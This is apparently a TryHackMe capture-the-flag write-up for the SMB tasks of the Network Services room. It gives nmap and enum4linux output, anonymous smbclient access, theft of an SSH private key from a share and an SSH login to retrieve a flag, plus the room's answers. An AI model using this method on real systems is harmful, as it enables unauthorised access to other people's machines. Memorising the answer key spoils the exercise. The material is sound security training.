TryHackMe has been awsome platform for learning Hacking/Security from the very basics. In Network Service room we have the usual culprits telnet, smb, ftp. Lets understand and solve the SMB part
Network Service Room Link – https://tryhackme.com/room/networkservices
Task Associated to SMB –
Task 2 Understanding SMB
Task 3 Enumerating SMB
Task 4 Exploiting SMB
We would use enum4linux and nmap to do this.
nmap scan on the machine helps in 99% of the times in CTF style challenges so.. [ I have only scanned selective ports instead of -p- , task is scan all to get all open ports
┌──(abhinav㉿ETHICALHACKX)-[~] └─$ sudo nmap -sV -A 10.10.232.67 -p- Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 20:18 EDT Nmap scan report for 10.10.232.67 Host is up (0.19s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA) | 256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA) |_ 256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: polosmb | NetBIOS computer name: POLOSMB\x00 | Domain name: \x00 | FQDN: polosmb |_ System time: 2021-05-20T00:18:22+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-20T00:18:22 |_ start_date: N/A TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 190.54 ms 10.8.0.1 2 190.72 ms 10.10.232.67 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds
──(abhinav㉿ETHICALHACKX)-[~] └─$ sudo enum4linux -A 10.10.232.67 [sudo] password for abhinav: Unknown option: A Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 19 19:25:31 2021 ========================== | Target Information | ========================== Target ........... 10.10.232.67 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.232.67 | ==================================================== [+] Got domain/workgroup name: WORKGROUP ============================================ | Nbtstat Information for 10.10.232.67 | ============================================ Looking up status of 10.10.232.67 POLOSMB <00> - B <ACTIVE> Workstation Service POLOSMB <03> - B <ACTIVE> Messenger Service POLOSMB <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ===================================== | Session Check on 10.10.232.67 | ===================================== [+] Server 10.10.232.67 allows sessions using username '', password '' =========================================== | Getting domain SID for 10.10.232.67 | =========================================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ====================================== | OS information on 10.10.232.67 | ====================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.232.67 from smbclient: [+] Got OS info for 10.10.232.67 from srvinfo: POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 ============================= | Users on 10.10.232.67 | ============================= Use of uninitialized value $users in print at ./enum4linux.pl line 874. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877. Use of uninitialized value $users in print at ./enum4linux.pl line 888. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890. ========================================= | Share Enumeration on 10.10.232.67 | ========================================= Sharename Type Comment --------- ---- ------- netlogon Disk Network Logon Service profiles Disk Users profiles print$ Disk Printer Drivers IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.232.67 //10.10.232.67/netlogon [E] Can't understand response: tree connect failed: NT_STATUS_BAD_NETWORK_NAME //10.10.232.67/profiles Mapping: OK, Listing: OK //10.10.232.67/print$ Mapping: DENIED, Listing: N/A //10.10.232.67/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ==================================================== | Password Policy Information for 10.10.232.67 | ==================================================== [+] Attaching to 10.10.232.67 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] POLOSMB [+] Builtin [+] Password Info for Domain: POLOSMB [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ============================== | Groups on 10.10.232.67 | ============================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================= | Users on 10.10.232.67 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-434125608-3964652802-3194254534 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) .. .. S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) .. .. S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-21-434125608-3964652802-3194254534 and logon username '', password '' S-1-5-21-434125608-3964652802-3194254534-514 *unknown*\*unknown* (8) S-1-5-21-434125608-3964652802-3194254534-515 *unknown*\*unknown* (8) S-1-5-21-434125608-3964652802-3194254534-516 *unknown*\*unknown* (8) .. .. S-1-5-21-434125608-3964652802-3194254534-550 *unknown*\*unknown* (8) S-1-5-21-434125608-3964652802-3194254534-1000 *unknown*\*unknown* (8) S-1-5-21-434125608-3964652802-3194254534-1001 *unknown*\*unknown* (8) S-1-5-21-434125608-3964652802-3194254534-1002 *unknown*\*unknown* (8) .. .. S-1-5-21-434125608-3964652802-3194254534-1046 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' ============================================= | Getting printer info for 10.10.232.67 | ============================================= No printers returned. enum4linux complete on Wed May 19 19:43:45 2021 ┌──(abhinav㉿ETHICALHACKX)-[~] └─$
Conduct an nmap scan of your choosing, How many ports are open?
From the above results we can observe we have 3 ports open – 22,139,445
What ports is SMB running on?139/445
nmap says that out loud
Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP
from enum4linux
What comes up as the name of the machine? POLOSMB
from enum4linux
What operating system version is running? 6.1
Under OS Information in enum4linux
What share sticks out as something we might want to investigate? profiles
from the result of enum4linux under sharename
┌──(abhinav㉿ETHICALHACKX)-[~] └─$ smbclient //10.10.232.67/profiles -U Anonymous Enter WORKGROUP\Anonymous's password: Try "help" to get a list of possible commands. smb: \> get "Working From Home Information.txt" getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \> help ? allinfo altname archive backup blocksize cancel case_sensitive cd chmod chown close del deltree dir du echo exit get getfacl geteas hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir more mput newer notify open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink posix_whoami print prompt put pwd q queue quit readlink rd recurse reget rename reput rm rmdir showacls setea setmode scopy stat symlink tar tarmode timeout translate unlock volume vuid wdel logon listconnect showconnect tcon tdis tid utimes logoff .. ! smb: \> ls . D 0 Tue Apr 21 07:08:23 2020 .. D 0 Tue Apr 21 06:49:56 2020 .cache DH 0 Tue Apr 21 07:08:23 2020 .profile H 807 Tue Apr 21 07:08:23 2020 .sudo_as_admin_successful H 0 Tue Apr 21 07:08:23 2020 .bash_logout H 220 Tue Apr 21 07:08:23 2020 .viminfo H 947 Tue Apr 21 07:08:23 2020 Working From Home Information.txt N 358 Tue Apr 21 07:08:23 2020 .ssh DH 0 Tue Apr 21 07:08:23 2020 .bashrc H 3771 Tue Apr 21 07:08:23 2020 .gnupg DH 0 Tue Apr 21 07:08:23 2020 12316808 blocks of size 1024. 7584016 blocks available smb: \> cd .ssh smb: \.ssh\> ls . D 0 Tue Apr 21 07:08:23 2020 .. D 0 Tue Apr 21 07:08:23 2020 id_rsa A 1679 Tue Apr 21 07:08:23 2020 id_rsa.pub N 396 Tue Apr 21 07:08:23 2020 authorized_keys N 0 Tue Apr 21 07:08:23 2020 12316808 blocks of size 1024. 7584016 blocks available smb: \.ssh\> tar c thmNetwork.tar NT_STATUS_ACCESS_DENIED opening remote file \.ssh\authorized_keys tar: dumped 2 files and 0 directories Total bytes written: 2075 (0.0 MiB/s) smb: \.ssh\> ──(abhinav㉿ETHICALHACKX)-[~/thm] └─$ cat 'Working From Home Information.txt' John Cactus, As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever possible, employees should work from home. As such- your account has now been enabled with ssh access to the main server. If there are any problems, please contact the IT department at it@polointernalcoms.uk Regards, James Department Manager──(abhinav㉿ETHICALHACKX)-[~/thm] └─$ ls thmNetwork.tar 'Working From Home Information.txt' ┌──(abhinav㉿ETHICALHACKX)-[~/thm] └─$ tar -xvf thmNetwork.tar ./.ssh/id_rsa ./.ssh/id_rsa.pub┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh] └─$ chmod 600 id_rsa ┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh] └─$ ls -la total 16 drwxr-xr-x 2 abhinav abhinav 4096 May 19 20:59 . drwxr-xr-x 3 abhinav abhinav 4096 May 19 20:59 .. -rw------- 1 abhinav abhinav 1679 Apr 21 2020 id_rsa -rw-r--r-- 1 abhinav abhinav 396 Apr 21 2020 id_rsa.pub ──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh] └─$ cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb7OaL8zLZ5Z8OU3wZPSIQHaoyI8Yc3I/8/Y6faWgYTZbfNPexli 0jxdAeTeGy2X3XACWcB4HFejbiNsMYLjy517gwWKPBvN865i8uIQ0Gqayq/KmBHpuBbR0yX/SpyfyvzR3V D16pg/D+WT8hLaNHSYm6FNYLsmVnWDSJDBhS179czftuoW55mw/OqzWVr5ln9cKeeuXlNV1lqCjBqF3C lzEBvN4JW8GS/riLTeHcXeMIMUTuIpr4XovN/VivIlLqTYy7lHuUh6L2RqAfw5+FSr4QZW1zHCMoS6 FooTomq/03EGJCGcp80/fT0e04n+7+PxnmvZQkOwe1A1hUG6C/ cactus@polosmb ┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh] └─$ ssh -i id_rsa cactus@10.10.232.67 Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu May 20 01:14:01 UTC 2021 System load: 0.0 Processes: 94 Usage of /: 33.3% of 11.75GB Users logged in: 0 Memory usage: 17% IP address for eth0: 10.10.232.67 Swap usage: 0% 22 packages can be updated. 0 updates are security updates. Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110 cactus@polosmb:~$ ls -l total 4 -rw-r--r-- 1 root root 20 Apr 21 2020 smb.txt cactus@polosmb:~$ cat smb.txt THM{smb_is_fun_eh?} cactus@polosmb:~$Task 4
Okay So we got in there, via smbclient,
we got the files required either by -c or zipping the ssh keys,
and on local host we can view id_rsa.pub to see the ssh username is cactus. at the end of file cactus@YOUR_MACHINE_IP
and we login using ssh -i id_rsa cactus@Machine_IP
next we ls to see a file smb.txt which we cat smb.txt to get the flagWhat would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //MACHINE_IP/secret -U suit -p 445
Does the share allow anonymous access? Y/N?
Y
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus
#from the Work From Home information.txt fileWhat service has been configured to allow him to work from home?
ssh
# from the Work From home Information.txt fileOkay! Now we know this, what directory on the share should we look in?
.ssh
#as now we know ssh keys might be present in ~/.sshThis directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa
#ssh keys are always named this by defaultWhat is the smb.txt flag?
THM{smb_is_fun_eh?}
#view the id_rsa.pub to get username and connect by ssh to ls & cat to see the flagI will update the section on Telnet and FTP soon.